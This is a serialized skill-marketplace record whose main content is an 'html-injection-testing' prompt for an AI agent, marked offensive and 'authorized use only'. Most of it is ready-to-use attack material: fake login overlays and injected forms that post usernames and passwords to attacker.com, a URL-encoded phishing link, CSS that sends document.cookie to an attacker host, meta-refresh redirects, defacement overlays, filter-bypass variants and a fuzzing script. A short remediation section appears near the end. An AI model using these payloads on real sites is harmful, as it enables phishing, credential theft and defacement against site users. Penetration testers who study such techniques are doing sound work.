[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-8c877b08-0a01-4a63-a082-0965618ec71d":3,"$fQksYBUT9U5ktdG8dJUgzipy03wlP8W_G0a7P-Sf0-6I":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"8c877b08-0a01-4a63-a082-0965618ec71d","html-injection-testing","识别并利用HTML注入漏洞，允许攻击者将恶意HTML内容注入到Web应用程序中。此漏洞使攻击者能够修改页面外观，创建钓鱼页面，并通过注入的表单窃取用户凭据。","cat_coding_review","mod_coding","sickn33,coding","---\nname: html-injection-testing\ndescription: \"Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# HTML Injection Testing\n\n## Purpose\n\nIdentify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.\n\n## Prerequisites\n\n### Required Tools\n- Web browser with developer tools\n- Burp Suite or OWASP ZAP\n- Tamper Data or similar proxy\n- cURL for testing payloads\n\n### Required Knowledge\n- HTML fundamentals\n- HTTP request\u002Fresponse structure\n- Web application input handling\n- Difference between HTML injection and XSS\n\n## Outputs and Deliverables\n\n1. **Vulnerability Report** - Identified injection points\n2. **Exploitation Proof** - Demonstrated content manipulation\n3. **Impact Assessment** - Potential phishing and defacement risks\n4. **Remediation Guidance** - Input validation recommendations\n\n## Core Workflow\n\n### Phase 1: Understanding HTML Injection\n\nHTML injection occurs when user input is reflected in web pages without proper sanitization:\n\n```html\n\u003C!-- Vulnerable code example -->\n\u003Cdiv>\n    Welcome, \u003C?php echo $_GET['name']; ?>\n\u003C\u002Fdiv>\n\n\u003C!-- Attack input -->\n?name=\u003Ch1>Injected Content\u003C\u002Fh1>\n\n\u003C!-- Rendered output -->\n\u003Cdiv>\n    Welcome, \u003Ch1>Injected Content\u003C\u002Fh1>\n\u003C\u002Fdiv>\n```\n\nKey differences from XSS:\n- HTML injection: Only HTML tags are rendered\n- XSS: JavaScript code is executed\n- HTML injection is often stepping stone to XSS\n\nAttack goals:\n- Modify website appearance (defacement)\n- Create fake login forms (phishing)\n- Inject malicious links\n- Display misleading content\n\n### Phase 2: Identifying Injection Points\n\nMap application for potential injection surfaces:\n\n```\n1. Search bars and search results\n2. Comment sections\n3. User profile fields\n4. Contact forms and feedback\n5. Registration forms\n6. URL parameters reflected on page\n7. Error messages\n8. Page titles and headers\n9. Hidden form fields\n10. Cookie values reflected on page\n```\n\nCommon vulnerable parameters:\n```\n?name=\n?user=\n?search=\n?query=\n?message=\n?title=\n?content=\n?redirect=\n?url=\n?page=\n```\n\n### Phase 3: Basic HTML Injection Testing\n\nTest with simple HTML tags:\n\n```html\n\u003C!-- Basic text formatting -->\n\u003Ch1>Test Injection\u003C\u002Fh1>\n\u003Cb>Bold Text\u003C\u002Fb>\n\u003Ci>Italic Text\u003C\u002Fi>\n\u003Cu>Underlined Text\u003C\u002Fu>\n\u003Cfont color=\"red\">Red Text\u003C\u002Ffont>\n\n\u003C!-- Structural elements -->\n\u003Cdiv style=\"background:red;color:white;padding:10px\">Injected DIV\u003C\u002Fdiv>\n\u003Cp>Injected paragraph\u003C\u002Fp>\n\u003Cbr>\u003Cbr>\u003Cbr>Line breaks\n\n\u003C!-- Links -->\n\u003Ca href=\"http:\u002F\u002Fattacker.com\">Click Here\u003C\u002Fa>\n\u003Ca href=\"http:\u002F\u002Fattacker.com\">Legitimate Link\u003C\u002Fa>\n\n\u003C!-- Images -->\n\u003Cimg src=\"http:\u002F\u002Fattacker.com\u002Fimage.png\">\n\u003Cimg src=\"x\" onerror=\"alert(1)\">  \u003C!-- XSS attempt -->\n```\n\nTesting workflow:\n```bash\n# Test basic injection\ncurl \"http:\u002F\u002Ftarget.com\u002Fsearch?q=\u003Ch1>Test\u003C\u002Fh1>\"\n\n# Check if HTML renders in response\ncurl -s \"http:\u002F\u002Ftarget.com\u002Fsearch?q=\u003Cb>Bold\u003C\u002Fb>\" | grep -i \"bold\"\n\n# Test in URL-encoded form\ncurl \"http:\u002F\u002Ftarget.com\u002Fsearch?q=%3Ch1%3ETest%3C%2Fh1%3E\"\n```\n\n### Phase 4: Types of HTML Injection\n\n#### Stored HTML Injection\n\nPayload persists in database:\n\n```html\n\u003C!-- Profile bio injection -->\nName: John Doe\nBio: \u003Cdiv style=\"position:absolute;top:0;left:0;width:100%;height:100%;background:white;\">\n     \u003Ch1>Site Under Maintenance\u003C\u002Fh1>\n     \u003Cp>Please login at \u003Ca href=\"http:\u002F\u002Fattacker.com\u002Flogin\">portal.company.com\u003C\u002Fa>\u003C\u002Fp>\n     \u003C\u002Fdiv>\n\n\u003C!-- Comment injection -->\nGreat article!\n\u003Cform action=\"http:\u002F\u002Fattacker.com\u002Fsteal\" method=\"POST\">\n    \u003Cinput name=\"username\" placeholder=\"Session expired. Enter username:\">\n    \u003Cinput name=\"password\" type=\"password\" placeholder=\"Password:\">\n    \u003Cinput type=\"submit\" value=\"Login\">\n\u003C\u002Fform>\n```\n\n#### Reflected GET Injection\n\nPayload in URL parameters:\n\n```html\n\u003C!-- URL injection -->\nhttp:\u002F\u002Ftarget.com\u002Fwelcome?name=\u003Ch1>Welcome%20Admin\u003C\u002Fh1>\u003Cform%20action=\"http:\u002F\u002Fattacker.com\u002Fsteal\">\n\n\u003C!-- Search result injection -->\nhttp:\u002F\u002Ftarget.com\u002Fsearch?q=\u003Cmarquee>Your%20account%20has%20been%20compromised\u003C\u002Fmarquee>\n```\n\n#### Reflected POST Injection\n\nPayload in POST data:\n\n```bash\n# POST injection test\ncurl -X POST -d \"comment=\u003Cdiv style='color:red'>Malicious Content\u003C\u002Fdiv>\" \\\n     http:\u002F\u002Ftarget.com\u002Fsubmit\n\n# Form field injection\ncurl -X POST -d \"name=\u003Cscript>alert(1)\u003C\u002Fscript>&email=test@test.com\" \\\n     http:\u002F\u002Ftarget.com\u002Fregister\n```\n\n#### URL-Based Injection\n\nInject into displayed URLs:\n\n```html\n\u003C!-- If URL is displayed on page -->\nhttp:\u002F\u002Ftarget.com\u002Fpage\u002F\u003Ch1>Injected\u003C\u002Fh1>\n\n\u003C!-- Path-based injection -->\nhttp:\u002F\u002Ftarget.com\u002Fusers\u002F\u003Cimg src=x>\u002Fprofile\n```\n\n### Phase 5: Phishing Attack Construction\n\nCreate convincing phishing forms:\n\n```html\n\u003C!-- Fake login form overlay -->\n\u003Cdiv style=\"position:fixed;top:0;left:0;width:100%;height:100%;\n            background:white;z-index:9999;padding:50px;\">\n    \u003Ch2>Session Expired\u003C\u002Fh2>\n    \u003Cp>Your session has expired. Please log in again.\u003C\u002Fp>\n    \u003Cform action=\"http:\u002F\u002Fattacker.com\u002Fcapture\" method=\"POST\">\n        \u003Clabel>Username:\u003C\u002Flabel>\u003Cbr>\n        \u003Cinput type=\"text\" name=\"username\" style=\"width:200px;\">\u003Cbr>\u003Cbr>\n        \u003Clabel>Password:\u003C\u002Flabel>\u003Cbr>\n        \u003Cinput type=\"password\" name=\"password\" style=\"width:200px;\">\u003Cbr>\u003Cbr>\n        \u003Cinput type=\"submit\" value=\"Login\">\n    \u003C\u002Fform>\n\u003C\u002Fdiv>\n\n\u003C!-- Hidden credential stealer -->\n\u003Cstyle>\n    input { background: url('http:\u002F\u002Fattacker.com\u002Flog?data=') }\n\u003C\u002Fstyle>\n\u003Cform action=\"http:\u002F\u002Fattacker.com\u002Fsteal\" method=\"POST\">\n    \u003Cinput name=\"user\" placeholder=\"Verify your username\">\n    \u003Cinput name=\"pass\" type=\"password\" placeholder=\"Verify your password\">\n    \u003Cbutton>Verify\u003C\u002Fbutton>\n\u003C\u002Fform>\n```\n\nURL-encoded phishing link:\n```\nhttp:\u002F\u002Ftarget.com\u002Fpage?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cinput%20name%3D%22user%22%20placeholder%3D%22Username%22%3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E%3Cbutton%3ELogin%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fdiv%3E\n```\n\n### Phase 6: Defacement Payloads\n\nWebsite appearance manipulation:\n\n```html\n\u003C!-- Full page overlay -->\n\u003Cdiv style=\"position:fixed;top:0;left:0;width:100%;height:100%;\n            background:#000;color:#0f0;z-index:9999;\n            display:flex;justify-content:center;align-items:center;\">\n    \u003Ch1>HACKED BY SECURITY TESTER\u003C\u002Fh1>\n\u003C\u002Fdiv>\n\n\u003C!-- Content replacement -->\n\u003Cstyle>body{display:none}\u003C\u002Fstyle>\n\u003Cbody style=\"display:block !important\">\n    \u003Ch1>This site has been compromised\u003C\u002Fh1>\n\u003C\u002Fbody>\n\n\u003C!-- Image injection -->\n\u003Cimg src=\"http:\u002F\u002Fattacker.com\u002Fdefaced.jpg\" \n     style=\"position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999\">\n\n\u003C!-- Marquee injection (visible movement) -->\n\u003Cmarquee behavior=\"alternate\" style=\"font-size:50px;color:red;\">\n    SECURITY VULNERABILITY DETECTED\n\u003C\u002Fmarquee>\n```\n\n### Phase 7: Advanced Injection Techniques\n\n#### CSS Injection\n\n```html\n\u003C!-- Style injection -->\n\u003Cstyle>\n    body { background: url('http:\u002F\u002Fattacker.com\u002Ftrack?cookie='+document.cookie) }\n    .content { display: none }\n    .fake-content { display: block }\n\u003C\u002Fstyle>\n\n\u003C!-- Inline style injection -->\n\u003Cdiv style=\"background:url('http:\u002F\u002Fattacker.com\u002Flog')\">Content\u003C\u002Fdiv>\n```\n\n#### Meta Tag Injection\n\n```html\n\u003C!-- Redirect via meta refresh -->\n\u003Cmeta http-equiv=\"refresh\" content=\"0;url=http:\u002F\u002Fattacker.com\u002Fphish\">\n\n\u003C!-- CSP bypass attempt -->\n\u003Cmeta http-equiv=\"Content-Security-Policy\" content=\"default-src *\">\n```\n\n#### Form Action Override\n\n```html\n\u003C!-- Hijack existing form -->\n\u003Cform action=\"http:\u002F\u002Fattacker.com\u002Fsteal\">\n\n\u003C!-- If form already exists, add input -->\n\u003Cinput type=\"hidden\" name=\"extra\" value=\"data\">\n\u003C\u002Fform>\n```\n\n#### iframe Injection\n\n```html\n\u003C!-- Embed external content -->\n\u003Ciframe src=\"http:\u002F\u002Fattacker.com\u002Fmalicious\" width=\"100%\" height=\"500\">\u003C\u002Fiframe>\n\n\u003C!-- Invisible tracking iframe -->\n\u003Ciframe src=\"http:\u002F\u002Fattacker.com\u002Ftrack\" style=\"display:none\">\u003C\u002Fiframe>\n```\n\n### Phase 8: Bypass Techniques\n\nEvade basic filters:\n\n```html\n\u003C!-- Case variations -->\n\u003CH1>Test\u003C\u002FH1>\n\u003CScRiPt>alert(1)\u003C\u002FScRiPt>\n\n\u003C!-- Encoding variations -->\n<h1>Encoded<\u002Fh1>\n%3Ch1%3EURL%20Encoded%3C%2Fh1%3E\n\n\u003C!-- Tag splitting -->\n\u003Ch\n1>Split Tag\u003C\u002Fh1>\n\n\u003C!-- Null bytes -->\n\u003Ch1%00>Null Byte\u003C\u002Fh1>\n\n\u003C!-- Double encoding -->\n%253Ch1%253EDouble%2520Encoded%253C%252Fh1%253E\n\n\u003C!-- Unicode encoding -->\n\\u003ch1\\u003eUnicode\\u003c\u002Fh1\\u003e\n\n\u003C!-- Attribute-based -->\n\u003Cdiv onmouseover=\"alert(1)\">Hover me\u003C\u002Fdiv>\n\u003Cimg src=x onerror=alert(1)>\n```\n\n### Phase 9: Automated Testing\n\n#### Using Burp Suite\n\n```\n1. Capture request with potential injection point\n2. Send to Intruder\n3. Mark parameter value as payload position\n4. Load HTML injection wordlist\n5. Start attack\n6. Filter responses for rendered HTML\n7. Manually verify successful injections\n```\n\n#### Using OWASP ZAP\n\n```\n1. Spider the target application\n2. Active Scan with HTML injection rules\n3. Review Alerts for injection findings\n4. Validate findings manually\n```\n\n#### Custom Fuzzing Script\n\n```python\n#!\u002Fusr\u002Fbin\u002Fenv python3\nimport requests\nimport urllib.parse\n\ntarget = \"http:\u002F\u002Ftarget.com\u002Fsearch\"\nparam = \"q\"\n\npayloads = [\n    \"\u003Ch1>Test\u003C\u002Fh1>\",\n    \"\u003Cb>Bold\u003C\u002Fb>\",\n    \"\u003Cscript>alert(1)\u003C\u002Fscript>\",\n    \"\u003Cimg src=x onerror=alert(1)>\",\n    \"\u003Ca href='http:\u002F\u002Fevil.com'>Click\u003C\u002Fa>\",\n    \"\u003Cdiv style='color:red'>Styled\u003C\u002Fdiv>\",\n    \"\u003Cmarquee>Moving\u003C\u002Fmarquee>\",\n    \"\u003Ciframe src='http:\u002F\u002Fevil.com'>\u003C\u002Fiframe>\",\n]\n\nfor payload in payloads:\n    encoded = urllib.parse.quote(payload)\n    url = f\"{target}?{param}={encoded}\"\n    \n    try:\n        response = requests.get(url, timeout=5)\n        if payload.lower() in response.text.lower():\n            print(f\"[+] Possible injection: {payload}\")\n        elif \"\u003Ch1>\" in response.text or \"\u003Cb>\" in response.text:\n            print(f\"[?] Partial reflection: {payload}\")\n    except Exception as e:\n        print(f\"[-] Error: {e}\")\n```\n\n### Phase 10: Prevention and Remediation\n\nSecure coding practices:\n\n```php\n\u002F\u002F PHP: Escape output\necho htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');\n\n\u002F\u002F PHP: Strip tags\necho strip_tags($user_input);\n\n\u002F\u002F PHP: Allow specific tags only\necho strip_tags($user_input, '\u003Cp>\u003Cb>\u003Ci>');\n```\n\n```python\n# Python: HTML escape\nfrom html import escape\nsafe_output = escape(user_input)\n\n# Python Flask: Auto-escaping\n{{ user_input }}  # Jinja2 escapes by default\n{{ user_input | safe }}  # Marks as safe (dangerous!)\n```\n\n```javascript\n\u002F\u002F JavaScript: Text content (safe)\nelement.textContent = userInput;\n\n\u002F\u002F JavaScript: innerHTML (dangerous!)\nelement.innerHTML = userInput;  \u002F\u002F Vulnerable!\n\n\u002F\u002F JavaScript: Sanitize\nconst clean = DOMPurify.sanitize(userInput);\nelement.innerHTML = clean;\n```\n\nServer-side protections:\n- Input validation (whitelist allowed characters)\n- Output encoding (context-aware escaping)\n- Content Security Policy (CSP) headers\n- Web Application Firewall (WAF) rules\n\n## Quick Reference\n\n### Common Test Payloads\n\n| Payload | Purpose |\n|---------|---------|\n| `\u003Ch1>Test\u003C\u002Fh1>` | Basic rendering test |\n| `\u003Cb>Bold\u003C\u002Fb>` | Simple formatting |\n| `\u003Ca href=\"evil.com\">Link\u003C\u002Fa>` | Link injection |\n| `\u003Cimg src=x>` | Image tag test |\n| `\u003Cdiv style=\"color:red\">` | Style injection |\n| `\u003Cform action=\"evil.com\">` | Form hijacking |\n\n### Injection Contexts\n\n| Context | Test Approach |\n|---------|---------------|\n| URL parameter | `?param=\u003Ch1>test\u003C\u002Fh1>` |\n| Form field | POST with HTML payload |\n| Cookie value | Inject via document.cookie |\n| HTTP header | Inject in Referer\u002FUser-Agent |\n| File upload | HTML file with malicious content |\n\n### Encoding Types\n\n| Type | Example |\n|------|---------|\n| URL encoding | `%3Ch1%3E` = `\u003Ch1>` |\n| HTML entities | `<h1>` = `\u003Ch1>` |\n| Double encoding | `%253C` = `\u003C` |\n| Unicode | `\\u003c` = `\u003C` |\n\n## Constraints and Limitations\n\n### Attack Limitations\n- Modern browsers may sanitize some injections\n- CSP can prevent inline styles and scripts\n- WAFs may block common payloads\n- Some applications escape output properly\n\n### Testing Considerations\n- Distinguish between HTML injection and XSS\n- Verify visual impact in browser\n- Test in multiple browsers\n- Check for stored vs reflected\n\n### Severity Assessment\n- Lower severity than XSS (no script execution)\n- Higher impact when combined with phishing\n- Consider defacement\u002Freputation damage\n- Evaluate credential theft potential\n\n## Troubleshooting\n\n| Issue | Solutions |\n|-------|-----------|\n| HTML not rendering | Check if output HTML-encoded; try encoding variations; verify HTML context |\n| Payload stripped | Use encoding variations; try tag splitting; test null bytes; nested tags |\n| XSS not working (HTML only) | JS filtered but HTML allowed; leverage phishing forms, meta refresh redirects |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,235,1857,"2026-05-16 13:22:22",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"编程开发","coding","mdi-code-braces","代码生成、调试、审查，提升开发效率",2,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"代码审查","review","mdi-magnify-scan","代码质量分析、安全审查",4,145,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"2a97a32d-6a41-4776-bf13-dd1baabdaa1a","1.0.0","html-injection-testing.zip",5281,"uploads\u002Fskills\u002F8c877b08-0a01-4a63-a082-0965618ec71d\u002Fhtml-injection-testing.zip","41c9ac2cd54d52d60a813f8dbba43755fc9887fbcfb0c05cfcbddcf90bbe0642","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":13292}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]